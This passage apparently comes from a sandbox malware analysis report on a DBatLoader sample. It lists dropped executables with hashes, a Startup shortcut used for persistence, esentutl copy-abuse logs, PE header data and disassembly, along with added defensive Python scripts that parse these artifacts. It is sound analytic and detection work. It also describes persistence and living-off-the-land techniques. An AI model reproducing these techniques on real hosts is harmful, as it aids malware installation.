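        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", data, opt)
    # Data directories start at +96 (PE32) or +112 (PE32+); entry 14 is the CLR runtime header.
    dd_off = opt + (96 if magic == 0x10B else 112)
    clr_rva, _clr_size = struct.unpack_from("<II", data, dd_off + 14 * 8)
    sections, end_of_sections = [], 0
    for i in range(nsec):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size])})
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    overlay = data[end_of_sections:]
    return {
        "machine": {0x14C: "x86", 0x8664: "x64"}.get(machine, hex(machine)),
        "pe32plus": magic == 0x20B,
        "is_dll": bool(chars & 0x2000),
        "is_dotnet": clr_rva != 0,           # what makes `file` say 'Mono/.Net assembly'
        "sections": sections,
        "overlay_size": len(overlay),
        "overlay_entropy": shannon_entropy(overlay),
    }


def triage(data: bytes) -> dict:
    info = {"size": len(data), "entropy": shannon_entropy(data), **hashes(data)}
    info["pe"] = pe_summary(data)
    info["bloated"] = is_bloated(info["size"], info["entropy"])
    return info


def build_test_pe(section: bytes, overlay: bytes, dotnet: bool = True) -> bytes:
    """Constructed minimal PE32 (one section, optional CLR directory) for offline self-tests."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                      # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                    # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                                      # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 72)               # constructed CLR RVA/size
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(section), 0x1000, len(section), 0x200,
                      0, 0, 0, 0, 0x60000020)
    headers = (dos + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    return headers + section + overlay


if __name__ == "__main__":
    sample = build_test_pe(b"\x00" * 256, bytes(range(256)) * 8)
    print(triage(sample))
```

Run it against the real dropped file with `triage(open(path, "rb").read())`; the whole-file entropy over 665 MB is a single Python pass and takes a while, but the overlay figure is the one to look at first, since a section-less tail of hundreds of megabytes at entropy near 8 is the padding pattern rather than a packed payload that the loader actually maps.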

Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 26 06:12:25 2024, mtime=Tue Nov 26 06:12:25 2024, atime=Tue Nov 26 06:12:25 2024, length=70656, window=
Category:dropped
Size (bytes):1772
Entropy (8bit):3.5027084517548843
Encrypted:false
SSDEEP:24:8fvm9DnSeiUcDzbAvoFG9l6R+O4ZvPqRB+0w0Tm:8nm9DpheQQo6R+ZXqRkFU
MD5:A41B9F43D88401725E34D3299FB39364
SHA1:13EFFB0EC310501CA0FC81AE928AC0B7BAEDEBE7
SHA-256:40686D20E5A21D2578F155F01864EA1ACAA09F324638E3D4F8C2BD97A6D57BEA
SHA-512:D274BA3D82EB56F0B1D6F07B21C55B430ED05D3A98F9792ABBB5A49F0F5833A3DF6E93CEC8F4B2CC89B08B4D351C8577F66FD39DEB2250C16A99EA8F9FED4E40
Malicious:false
Reputation:unknown
Preview:L..................F.@.. .......?......?......?............................:..DG..Yr?.D..U..k0.&...&.........5q....x.{.?..*...?......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NzY.9...........................c..A.p.p.D.a.t.a...B.V.1.....zY.9..Roaming.@......EW)NzY.9...........................n..R.o.a.m.i.n.g.....T.1.....zY.9..ACCApi..>......zY.9zY.9....A.....................E.-.A.C.C.A.p.i.....b.2.....zY.9 .apihost.exe.H......zY.9zY.9....B.....................w...a.p.i.h.o.s.t...e.x.e......._...............-.......^...........I.Z`.....C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.2.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................................
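The shortcut above is flagged Malicious:false, yet its preview is the most readable persistence artifact in this section: a 70,656-byte target at C:\Users\user\AppData\Roaming\ACCApi\apihost.exe, the description "AccSys", a relative path of the form ..\..\..\..\..\ACCApi\apihost.exe, and an icon/source string %USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe. Note also the literal C:\Users\brok\AppData\Local\Temp\Trading_AIBot.exe embedded in it: "brok" is not the sandbox's username, so that string was not derived from the analysis environment and is worth checking against other samples. The following Python is an added example (not Joe Sandbox code) that parses the fixed Shell Link header and StringData of a .lnk per MS-SHLLINK, skipping the item ID list and LinkInfo blocks, and resolves the relative path against the folder the shortcut sits in. The sample shortcut it builds is constructed from the strings visible in the preview; which StringData field each of those strings occupies in the real file, and the Startup-folder location used for the resolution, are assumptions.

```python
"""Parse a Windows .lnk (MS-SHLLINK) to recover target strings, offline.

Added example; not Joe Sandbox code. The builder produces a constructed sample
carrying the strings seen in the report's preview; field assignment is assumed.
"""
import ntpath
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON = 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON))


def parse_lnk(data: bytes) -> dict:
    """Return flags, target size and the StringData fields of a Shell Link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link")
    (flags,) = struct.unpack_from("<I", data, 20)
    (target_size,) = struct.unpack_from("<I", data, 52)      # the report's 'length=70656'
    pos = 0x4C
    if flags & HAS_ID_LIST:          # IDListSize (uint16) excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize (uint32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "target_size": target_size}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            out[key] = None
            continue
        (count,) = struct.unpack_from("<H", data, pos)       # CountCharacters, no terminator
        if flags & IS_UNICODE:
            out[key] = data[pos + 2:pos + 2 + 2 * count].decode("utf-16-le")
            pos += 2 + 2 * count
        else:                        # ANSI: system code page; cp1252 assumed here
            out[key] = data[pos + 2:pos + 2 + count].decode("cp1252", "replace")
            pos += 2 + count
    return out


def resolve_relative(lnk_dir: str, relative_path: str) -> str:
    """RELATIVE_PATH is relative to the .lnk's own folder, not to the working directory."""
    return ntpath.normpath(ntpath.join(lnk_dir, relative_path))


def user_writable(path: str) -> bool:
    """Heuristic (assumed): targets under a profile or temp directory need no admin rights."""
    p = path.lower()
    return "\\appdata\\" in p or "\\temp\\" in p or p.startswith("c:\\programdata\\")


def build_lnk(name=None, relative_path=None, working_dir=None, arguments=None,
              icon_location=None, file_size=0) -> bytes:
    """Constructed minimal Shell Link: header + Unicode StringData, no IDList/LinkInfo."""
    values = dict(name=name, relative_path=relative_path, working_dir=working_dir,
                  arguments=arguments, icon_location=icon_location)
    flags, body = IS_UNICODE, b""
    for key, bit in STRING_FIELDS:
        s = values[key]
        if s is not None:
            flags |= bit
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,   # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, file_size, 0, 1, 0, 0, 0, 0)               # SW_SHOWNORMAL
    return header + body


if __name__ == "__main__":
    sample = build_lnk(name="AccSys", relative_path="..\\..\\..\\..\\..\\ACCApi\\apihost.exe",
                       working_dir="C:\\Users\\user\\AppData\\Roaming\\ACCApi",
                       icon_location="%USERPROFILE%\\AppData\\Local\\Temp\\Trading_AIBot.exe",
                       file_size=70656)
    info = parse_lnk(sample)
    startup = "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
    print(info, resolve_relative(startup, info["relative_path"]))
```

Five `..\` steps from a per-user Startup folder land in AppData\Roaming, which is why a relative path of that shape combined with an absolute target under Roaming is a common shape for user-level autostart shortcuts. Against the real file, point `parse_lnk` at its bytes and feed `resolve_relative` the directory the sandbox says the shortcut was written to.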

Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1348608
Entropy (8bit):7.253758937779228
Encrypted:false
SSDEEP:24576:CQW4qoNUgslKNX0Ip0MgHCpoMBOuhsqjnhMgeiCl7G0nehbGZpbD:CQW9BKNX0IPgiKMBOu1Dmg27RnWGj
MD5:907DB1B5C7DE81B95CC62375B2502582
SHA1:248091D3AE8CDC05AB48E6A576529B014934B656
SHA-256:FD10440B3F8565AC791862DC5A31D116D1BB454A9A350435D6EAB881C81E5AD5
SHA-512:61BF867E85C045D8D71BCF6C03CA01A73EAD0CEF22F83F960ED066C9942206BD8F361C2A9F424F819E6BF6845AE62DD9BD4A52FA2BB09ED792969A683A939270
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................Nz.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1224192
Entropy (8bit):5.163565147363484
Encrypted:false
SSDEEP:24576:X2G7AbHjkSsqjnhMgeiCl7G0nehbGZpbD:X2G7AbHjXDmg27RnWGj
MD5:0A64A4ED4EB3C629A98F377037B6EC4E
SHA1:7F60B62D4169F4FD6BD7631CC2C0AC5135C2C514
SHA-256:C49D25BA7DC658D225C9686ED2CD4B2F5D5096C0B8CCF66B420EFD8F824D90C9
SHA-512:301056D14BF179D244928D2B4D1E6F6BCD89E2B34A4FFF5AD8762829487812C2CA06E9ABAA20B2BEE4EF4396A2259F4D27E047ED6C635FDACDAB844EF849B640
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1242624
Entropy (8bit):7.28896258780016
Encrypted:false
SSDEEP:24576:gkdpSI+K3S/GWei+qNv2uG36sqjnhMgeiCl7G0nehbGZpbD:g6SIGGWei2uG3ODmg27RnWGj
MD5:BB9DE1AD24CC587EB4D9FB9CF61AE13B
SHA1:B5513F9D17E5728481C555C9AA08CB5B3DA78DF7
SHA-256:3485FB788C57C77ACBAD6537F2CE2CA75FD94DF78A7B9918A79720193B7E3028
SHA-512:B1EE98851B97E85F70B06A6E58F0AA719C0F4A70CF798772E3B8F6225EB9A5B9878134876A72C44AD238F5056856D38A54AE2EC22D37129D2F65D5F8898B23ED
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......F}.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1225728
Entropy (8bit): 5.1633259316778375
Encrypted: false
SSDEEP: 12288:LEP3R6LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q6LsqjnhMgeiCl7G0nehbGZpbD
MD5: E471E4037B76A28D3D82E42538FC3807
SHA1: 0D9C2B6AEF2DEAC247F85587827630E425F71DFA
SHA-256: 6E23959A1A5C16CC7178AF0B9C52FEA6F73A5C11FDD661AE140774E057C8233A
SHA-512: B35DF6254C602CB843AF9328AD71EDB38D6EB31DF3A94529BC384AE960CFD4DDB5A3E75E64AA60900A495970AD4D3158F5CABFE62C280F808D3DAFA9E4AEFBE6
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

Process: C:\Windows\System32\alg.exe
File Type: data
Category: dropped
Size (bytes): 12320
Entropy (8bit): 7.98364637414295
Encrypted: false
SSDEEP: 384:YFeJuDbsvYPU4LlBHBj1j+4Gl3tfqkszEKf2QXCNUOgJ:YFRsQPUCBHTj+4Gl9ns1LggJ
MD5: A055973748358743BD8C06CF92051938
SHA1: F9E3C80F71DD7C7556A004ABB00E2344A8DC5639
SHA-256: 475CB30999E6B9AEE2FFED8139CB9626751973138335A871A71131B0F2D527B6
SHA-512: A6A58479BAD8EA0C1494C444DFCBA5EE0DFAEED7224E47BA89144B981ACD1D7007FF3C288DDBEE290C55D5E65344935159239A21B0D74D319ECE9D183E80B43A
Malicious: false
Reputation: unknown
Preview: ....~..~7....c..>.R..&...:PX.Sf3.y.q.a....O"8n.2...[I..~.v. .... /.#...L .V5>..1.!..[.-.^q.U...y.u............3A6dV.49...:I7.?...h.....|..;..Y......L.<.Q...}.SM0.......8m. v..n..G.X.Z.l..F:.r.t...;.........3L..:.%.#/...n.&..s .s.Xy....a..\.K.Z...;..w../.QpbA.....Z.v.=..O..e~ZA..2.=. ....2..7J-..$B...M.$...J.R.. ....x.L.C..q7Qc~#..n..".U.U.wl.E....I.:.O..f..Hq.E...|..<..AW....7...t..c.;..(.D.&...A...g.B...f_...|K.p..{.%V..'W....n...6........)y...Y...~/g......N....bSD.h.t..<.!:.|.rU3.Y..(.-...T...4....9..Z.$fG..Q...5.@.2.",...A0n..:...<^..U....|....M#..|.....64.)Q..aF...J.U.N.....]=.`.j.F1R.g;....A..@#..`I...:U...{...r......[..|..B.od.R.....e..[s,...h.x6@.ug..N.P....<oJE4FU&....=S.#......XRn.n.U.q..M..v.O.>.0..T...G..l.)...nG........%.rt.d-bK..brp..p....,...C...l.....O......A.<..uZ...N(Q#..-.|.n....T.n.._,....'E.=....N.+....../..-k....(...}..7.....7.$......`. .....tIv^.$....RB.. .S..r.....!.l...He....w......7<...%.v.."=..).K&{....)"...I.I\9.....ZF$

Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 589
Entropy (8bit): 4.653524581215269
Encrypted: false
SSDEEP: 12:qftxTzmBzeSbZ7u0wxDDDDDDDDjCaY5Da3laYAV/TB8NGNgL:GtxTzkzp7u0wQakDa1aT/t8NN
MD5: 6C238F155BC10840242D1292443665E6
SHA1: 0AF69C1B8527760742A66E2AABF97B2458C79B16
SHA-256: 05012D9A97E2F251395B193C6CDE3DDE542E29A3B85049823437DC3D48A0703A
SHA-512: EA5163FFA63C5DEE3A8FA6B9D338ECF48AB196B6BDE0001EF75C298A849CD0C0060EC5921A545B20CC80E5857B38B8CB1E609CE7BC1D6A2A09CB91B0ABF20EB2
Malicious: false
Reputation: unknown
Preview: ..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\C6dAUcOA6M.exe...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b800 (1226752) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.141 seconds.....

Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 560
Entropy (8bit): 4.531408806270406
Encrypted: false
SSDEEP: 12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNu:/p4xT5cp7u0wQakB4aV4t8N/
MD5: 3AAD6503854EEE988A985FDB8AEA2D0A
SHA1: 6A05F4A808955462A3B892E140082E6996F61602
SHA-256: 13AED35D56E59B0160FDD47AB845B9F0E12EDF5CE70EE125BC7C5F9CA306BEB3
SHA-512: 4B03346B75E7EEC6196184415E4D84F1B33215E954C9B8DCE3807141C981A759F3E3B91A7F36CE2DE821C2005172FD4AE6C999431C668A73E72DA0916688EA42
Malicious: false
Reputation: unknown
Preview: ..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.46 seconds.....
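The two esentutl.exe output files above are the trace DBatLoader leaves when it abuses `esentutl /y` as a copy utility: the submitted sample is written to a .PIF under C:\Users\Public\Libraries, and ping.exe is copied to C:\Users\Public\xpha.pif under a new name. The script below is an added example, not part of the Joe Sandbox report or of any vendor tooling: it parses that COPY FILE output and applies the checks an analyst would make from these fields. The log text is a reconstruction of the two previews with CR/LF restored (the report renders line terminators as dots); the finding labels, the list of suspicious extensions and the expected sample size (taken from the File size field of the submitted sample) are this example's own conventions.

```python
"""Parse esentutl.exe 'COPY FILE mode' output and flag LOLBin copy abuse.

Added example, not from the sandbox report. Input logs are reconstructed from the
two report previews; finding names and the extension list are assumptions here.
"""
import re
from pathlib import PureWindowsPath

SUBMITTED_SAMPLE_SIZE = 1226752               # 'File size' of C6dAUcOA6M.exe in the report
SUSPICIOUS_EXTENSIONS = {".pif", ".scr", ".com"}  # assumed list; .pif is what the report shows

# Constructed: the two esentutl output files above, with line terminators restored.
ESENTUTL_LOGS = [
    "\r\nInitiating COPY FILE mode...\r\n\r\n"
    "     Source File: C:\\Users\\user\\Desktop\\C6dAUcOA6M.exe\r\n"
    "Destination File: C:\\\\Users\\\\Public\\\\Libraries\\\\Juqmtmya.PIF\r\n\r\n"
    "                  Copy Progress (% complete)\r\n\r\n"
    "          0    10   20   30   40   50   60   70   80   90  100\r\n"
    "          |----|----|----|----|----|----|----|----|----|----|\r\n"
    "          ...................................................\r\n\r\n"
    "Total bytes read = 0x12b800 (1226752) (1 MB)\r\n"
    "Total bytes written = 0x12c000 (1228800) (1 MB)\r\n\r\n"
    "Operation completed successfully in 0.141 seconds.\r\n",
    "\r\nInitiating COPY FILE mode...\r\n\r\n"
    "     Source File: C:\\\\Windows\\\\System32\\\\ping.exe\r\n"
    "Destination File: C:\\\\Users\\\\Public\\\\xpha.pif\r\n\r\n"
    "                  Copy Progress (% complete)\r\n\r\n"
    "          0    10   20   30   40   50   60   70   80   90  100\r\n"
    "          |----|----|----|----|----|----|----|----|----|----|\r\n"
    "          ...................................................\r\n\r\n"
    "Total bytes read = 0x4a00 (18944) (0 MB)\r\n"
    "Total bytes written = 0x5000 (20480) (0 MB)\r\n\r\n"
    "Operation completed successfully in 0.46 seconds.\r\n",
]


def _path(raw):
    """esentutl echoes the argument it was given; the doubled backslashes in the
    report come from how the caller quoted the path, so collapse them first."""
    return PureWindowsPath(raw.strip().replace("\\\\", "\\"))


def parse_copy_log(text):
    """Return source, destination, byte counts and status, or None if this is
    not COPY FILE output (esentutl has several other modes)."""
    if "Initiating COPY FILE mode" not in text:
        return None

    def grab(pattern, conv=str):
        m = re.search(pattern, text)
        if m is None:
            raise ValueError("esentutl log is missing a field: %s" % pattern)
        return conv(m.group(1))

    return {
        "source": _path(grab(r"Source File:\s*([^\r\n]+)")),
        "destination": _path(grab(r"Destination File:\s*([^\r\n]+)")),
        "bytes_read": grab(r"Total bytes read = 0x([0-9a-fA-F]+)", lambda h: int(h, 16)),
        "bytes_written": grab(r"Total bytes written = 0x([0-9a-fA-F]+)", lambda h: int(h, 16)),
        "succeeded": "Operation completed successfully" in text,
    }


def assess(rec):
    """Triage checks over one parsed record; labels are this example's own."""
    src, dst = rec["source"], rec["destination"]
    findings = []
    if str(dst).lower().startswith("c:\\users\\public\\"):
        findings.append("public-drop")             # shared, world-writable location
    if dst.suffix.lower() in SUSPICIOUS_EXTENSIONS:
        findings.append("suspicious-extension")    # executable content behind a non-.exe name
    if (str(src).lower().startswith("c:\\windows\\system32\\")
            and src.stem.lower() != dst.stem.lower()):
        findings.append("renamed-system-binary")   # OS tool copied out under another name
    if rec["bytes_read"] == SUBMITTED_SAMPLE_SIZE:
        findings.append("copies-submitted-sample")  # byte count matches the analysed file
    return findings


if __name__ == "__main__":
    for log in ESENTUTL_LOGS:
        rec = parse_copy_log(log)
        print(rec["source"], "->", rec["destination"], assess(rec))
```

The byte count check is what ties the first log to the sample itself: 0x12b800 read equals the 1'226'752-byte File size reported for C6dAUcOA6M.exe, so the .PIF in Public\Libraries is a straight copy of the submitted binary. The same parser can be pointed at esentutl output recovered from a host, provided the command was run in COPY FILE mode.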

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.458699684550258
TrID:
• Win32 Executable (generic) a (10002005/4) 99.81%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: C6dAUcOA6M.exe
File size: 1'226'752 bytes
MD5: 53f0663219e6091cecd600c59389711f
SHA1: f1986a61c2cb0107444fbd3e8075a25e21fb26ca
SHA256: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb
SHA512: 9d466680cc90f57ada29495e32592084ec6daf37cdc53f2776a720d66f0284b09c619a25c9ede8e73e91b8c20d2a7ab5dfee0504ba7454389ce842afd27962a1
SSDEEP: 24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
TLSH: 55456AE5E4A1F4F3F0115571DA0F939A6A577D233665A643AFD23E0A0EB464C2C0AFC2
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 353541e45ce40145
Entrypoint: 0x45e754
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                    Import Hash:d3cc1904f8cbf58ea5e134fbf8956c7a
                                                                                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                                                                                                                                                                                                    mov eax, 0045CE30h
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE901A0E5h
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [0046998Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE9067105h
                                                                                                                                                                                                                                                                                                                                                    mov ecx, dword ptr [00469A7Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [0046998Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                                                                                    mov edx, dword ptr [0045CA58h]
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE9067105h
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [0046998Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE9067179h
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE90180F0h
                                                                                                                                                                                                                                                                                                                                                    lea eax, dword ptr [eax+00h]
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
